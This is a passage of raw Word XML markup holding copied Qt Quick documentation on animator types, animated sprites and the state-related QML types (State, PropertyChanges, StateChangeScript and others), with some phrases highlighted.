          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2408" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>RotationAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates the rotation of an</w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2409" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2410" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OpacityAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates the opacity of an</w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2411" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2412" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00365F6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>UniformAnimator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Animates a uniform in a</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2413" w:history="1">
        <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE44AA" w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2042" w:name="animated-sprites"/>
      <w:bookmarkStart w:id="2043" w:name="_Toc483000972"/>
      <w:bookmarkStart w:id="2044" w:name="_Toc483003963"/>
      <w:bookmarkStart w:id="2045" w:name="_Toc483604315"/>
      <w:bookmarkStart w:id="2046" w:name="_Toc483605535"/>
      <w:bookmarkEnd w:id="2042"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Animated Sprites</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2043"/>
      <w:bookmarkEnd w:id="2044"/>
      <w:bookmarkEnd w:id="2045"/>
      <w:bookmarkEnd w:id="2046"/>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRPr="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00AE44AA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The concept of animated sprites </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">separate to the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as used elsewhere on this page. If you want to create or use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00365F6D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animated image or sprite</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidR="00365F6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2414" w:history="1">
        <w:r w:rsidRPr="00AE44AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>sprite animations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE44AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE44AA" w:rsidRDefault="00AE44AA" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00365F6D" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2415" w:history="1">
        <w:r w:rsidR="00365F6D" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-statesanimations-states.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="008B1DCE" w:rsidRDefault="00D911ED" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2047" w:name="_Toc483000973"/>
      <w:bookmarkStart w:id="2048" w:name="_Toc483003964"/>
      <w:bookmarkStart w:id="2049" w:name="_Toc483604316"/>
      <w:bookmarkStart w:id="2050" w:name="_Toc483605536"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Qt Quick State</w:t>
      </w:r>
      <w:bookmarkStart w:id="2051" w:name="related-types"/>
      <w:bookmarkEnd w:id="2047"/>
      <w:bookmarkEnd w:id="2048"/>
      <w:bookmarkEnd w:id="2049"/>
      <w:bookmarkEnd w:id="2050"/>
      <w:bookmarkEnd w:id="2051"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9716"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047"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2416" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>AnchorChanges</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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Specifies how to change the anchors of an item in a state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2417" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ParentChange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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Specifies how to reparent an Item in a state change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00907F7D" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:hyperlink r:id="rId2418" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00907F7D">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="auto"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>PropertyChanges</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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Describes new property bindings or values for a state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2419" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>State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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Defines configurations of objects and properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2420" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00D911ED">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="FF0000"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>StateChangeScript</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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Specifies how to run a script in a state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D911ED" w:rsidRPr="002230B8" w:rsidTr="00D911ED">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D911ED" w:rsidRPr="00907F7D" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:hyperlink r:id="rId2421" w:history="1">
              <w:r w:rsidR="00D911ED" w:rsidRPr="00907F7D">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="auto"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>StateGroup</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D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D911ED">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Provides built-in state support for non-Item types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Many user interface designs are</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">state </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; interfaces have </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>differ depending on the current state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, a traffic signal will configure its flags or lights depending on its state. While in the signal's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
